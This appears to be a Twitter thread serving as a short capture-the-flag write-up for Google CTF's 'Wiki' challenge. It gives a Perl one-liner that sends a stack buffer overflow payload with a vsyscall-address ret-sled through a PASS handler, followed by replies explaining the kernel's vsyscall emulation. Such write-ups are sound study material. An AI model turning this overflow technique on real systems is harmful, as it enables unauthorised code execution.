"Writeup" for Wiki at #GoogleCTF
perl -e 'print "USER\n1MB\@tMaN\nPASS\n"."a"x152 .pack("Q",0xffffffffff600000)x23 ."\n"."\0"x8 ."\n"'
-
-
The gist of it is: stack-based BOF in PASS handler, with no info leak. Write RET-sled using vsyscall gadget... (1/2)
2 replies 0 retweets 1 like -
Wasted so much time on this. You sol. works, but using 0xffffffffff600007 or 0xffffffffff600009 for the "ret sled" doesnt, not sure why?
2 replies 0 retweets 1 like -
If you look at dmesg, it should tell you that the process was killed because of a misaligned jump to vsyscall. This is a kernel mitigation.
1 reply 0 retweets 1 like -
In fact
@tehjh told me yesterday that the whole page is basically fake and it is only simulated by the kernel, that's how it controls access1 reply 0 retweets 2 likes
you can see that the kernel emulates the whole function, including syscall and return, and generates segfaults on -EFAULT
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.